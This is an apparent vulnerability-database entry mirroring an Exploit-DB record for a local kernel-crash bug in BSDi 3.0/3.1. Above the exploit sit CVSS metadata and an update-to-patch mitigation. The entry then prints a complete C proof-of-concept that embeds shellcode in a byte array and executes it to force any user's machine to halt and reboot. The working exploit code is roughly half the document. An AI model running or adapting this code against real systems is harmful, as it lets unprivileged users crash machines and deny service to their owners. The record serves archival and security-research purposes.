BSDi v3.0/3.1 System Failure

vendor:

BSDI OS

by:

7.2

CVSS

HIGH

Locally Exploitable Vulnerability

119

CWE

Product Name: BSDI OS

Affected Version From: 3

Affected Version To: 3.1

Patch Exists: YES

Related CWE: N/A

CPE: o:bsdi:bsdi_os

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Arch/Non-Specific to BSDI

2002

BSDi v3.0/3.1 System Failure

It has been reported that there is a locally exploitable vulnerability in BSDI. It is allegedly possible for a userland process to cause the kernel to halt. This may be due to a bad system call.

Mitigation:

Update to the latest version of BSDI

Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/3220/info

It has been reported that there is a locally exploitable vulnerability in BSDI.

It is allegedly possible for a userland process to cause the kernel to halt.

This may be due to a bad system call. 
*/

/* (BSDi)*[v3.0/3.1] system failure, by
   v9[v9@realhalo.org].  this will result
   in the ability of any user to fail the
   system, and reboot it.  this bug is
   similar to that of the "f00f" bug.
   results are similar, except this reboots
   the machine instead of having a freezing
   effect.  tested, and built for: BSDi
   v3.0/3.1. (arch/non-specific to BSDi)
*/
char bsdi_killcode[] =
 "\xb8\x8f\xf8\xff\x0b\xf7\xd0\x50\xb0\x0b"
 "\xb0\x9a\x50\x89\xe7\xff\xd7";
int main() {
 void (*execcode)()=(void *)bsdi_killcode;
 printf("[ (BSDi)*[v3.0/3.1]: system failu"
 "re, by: v9[v9@realhalo.org]. ]\n");
 printf("*** no output should be seen afte"
 "r this point.\n");
 execcode();
 printf("*** system failure failed.\n");
 exit(0);
}